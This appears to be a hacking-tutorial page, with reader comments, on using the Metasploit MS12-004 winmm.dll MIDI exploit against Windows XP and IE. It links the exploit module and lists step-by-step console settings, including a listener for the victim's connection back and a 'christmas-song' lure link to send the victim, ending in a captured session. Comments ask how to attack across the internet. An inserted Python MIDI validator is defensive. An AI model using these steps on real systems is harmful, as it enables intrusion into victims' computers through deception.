Type : Tutorial
Level : Medium
Attacker O.S : Backtrack 5 R1
Victim O.S : Windows XP SP3
Vulnerable Application : Windows Multimedia Library (winmm.dll)
Exploit Credits : Shane Garrett, Juan Vazquez, Sinn3r
This module exploits a heap overflow vulnerability in the Windows Multimedia Library (winmm.dll). The vulnerability occurs when parsing specially crafted MIDI files. Remote code execution can be achieved by using Windows Media Player's ActiveX control.
Exploitation is done by supplying a specially crafted MIDI file with specific events, causing the offset calculation to be higher than the amount of memory available on the heap (0x400 bytes allocated by WINMM!winmmAlloc), which then allows us to either "inc al" or "dec al" a byte. This can be used to corrupt an array (CImplAry) we set up, and force the browser to confuse types from tagVARIANT objects, which leads to remote code execution in the context of the user.
At this time, for the IE 8 target, JRE (Java Runtime Environment) is required to bypass DEP (Data Execution Prevention).
Note: Based on our testing, the vulnerability does not seem to trigger when the victim machine is operated via rdesktop.
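A structural check a defender could run on incoming MIDI files before a legacy parser such as winmm.dll sees them, added here as an example (it is not from the original post or from the Metasploit module): it walks the chunk framing and every track event and reports when a declared length or an event runs past the bytes actually present in the file. The sample files are constructed inline.

```python
import struct

def read_varlen(buf, pos, end):
    value = 0                          # MIDI variable-length quantity, never read past `end`
    while pos < end:
        value, pos = (value << 7) | (buf[pos] & 0x7F), pos + 1
        if not buf[pos - 1] & 0x80:
            return value, pos
    raise ValueError("variable-length quantity runs past track end")

def walk_track(buf, pos, end):
    status = None                      # walk every event in [pos, end); raise on the first overrun
    while pos < end:
        _, pos = read_varlen(buf, pos, end)                  # delta time
        if pos >= end:
            raise ValueError("delta time with no event after it")
        if buf[pos] & 0x80:
            status, pos = buf[pos], pos + 1                  # new status byte (else running status)
        elif status is None:
            raise ValueError("data byte before any status byte")
        if status >= 0xF0:                                   # meta (0xFF) / sysex (0xF0, 0xF7): length-prefixed
            pos += status == 0xFF                            # meta events carry a type byte first
            n, pos = read_varlen(buf, pos, end)
        else:                                                # channel voice message: 1 or 2 data bytes
            n = 1 if status >> 4 in (0xC, 0xD) else 2
        if pos + n > end:
            raise ValueError(f"event needs {n} data bytes, only {end - pos} left in track")
        pos += n

def validate_midi(data):
    # Returns a list of framing problems; an empty list means every chunk and event stays in bounds
    if len(data) < 14 or data[:8] != b"MThd" + struct.pack(">I", 6):
        return ["bad or missing MThd header"]
    problems, pos = [], 14
    while pos + 8 <= len(data):
        tag, length = data[pos:pos + 4], struct.unpack(">I", data[pos + 4:pos + 8])[0]
        if pos + 8 + length > len(data):
            problems.append(f"{tag!r} at {pos}: declared length {length}, {len(data) - pos - 8} bytes left")
            break
        if tag == b"MTrk":                                   # unknown chunk types are skipped by their length
            try:
                walk_track(data, pos + 8, pos + 8 + length)
            except ValueError as err:
                problems.append(f"{tag!r} at {pos}: {err}")
        pos += 8 + length
    return problems

# Constructed samples (not from the page): a valid one-track file, and a copy whose MTrk length is inflated far past its 12 data bytes
GOOD_MIDI = (b"MThd" + struct.pack(">IHHH", 6, 0, 1, 96) + b"MTrk" + struct.pack(">I", 12)
             + b"\x00\x90\x3c\x40" + b"\x60\x80\x3c\x40" + b"\x00\xff\x2f\x00")
OVERSIZED_MIDI = GOOD_MIDI[:18] + struct.pack(">I", 0x400) + GOOD_MIDI[22:]
```

A file that fails this check is not necessarily malicious, but it should never reach a parser that trusts its declared lengths.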
1. Metasploit Framework (Windows/Linux)
2. ms12_004_midi.rb exploit (download link: Mediafire.com)
Attacker IP Address : 192.168.1.7
Victim IP Address : 192.168.1.6
1. Download the exploit above and copy it to the destination folder using the following command:
cp ms12_004_midi.rb /pentest/exploits/framework/modules/exploits/windows/browser/
2. Run the Metasploit Framework with the msfconsole command, then use the exploit you added in step 1.
3. Next, view the available options by running the show options command. The example below sets only the options needed to make the exploit run without problems.
Information :
set srvhost 192.168.1.7 --> attacker server host (attacker IP address)
set srvport 80 --> local port opened to receive connections from the victim
set uripath christmas-song --> social engineering link path
set lhost 192.168.1.7 --> lhost IP address that receives the payload connection
set lport 443 --> local port that receives the payload connection from the victim
exploit --> run the exploit
http://192.168.1.7/christmas-song --> link to send to the victim
4. When the victim opens the malicious link, our Backtrack console shows an active session and we have access to their computer.
Pwned!
1. Always keep Windows updated. If you're using Windows XP, you can migrate to Windows 7.
Hope you enjoyed
Everything works great... only, as we can see, it is all done in the local LAN on localhost; it would be nice to do all this from OUTSIDE, or rather from a remote PC towards another IP, but what seems to be the problem is how to bypass the router to get into the LAN and see the PCs?
#osettobubu
you can refer my tutorial here about how to hack from WAN http://www.hacking-tutorial.com/computer/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-logic/
Sorry, I can't write in Italian.
No, you cannot do that from the internet because of the router/firewall which, as you guessed, would very likely block the incoming packets.
#Reginald
http://www.hacking-tutorial.com/hacking-tutorial/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-logic/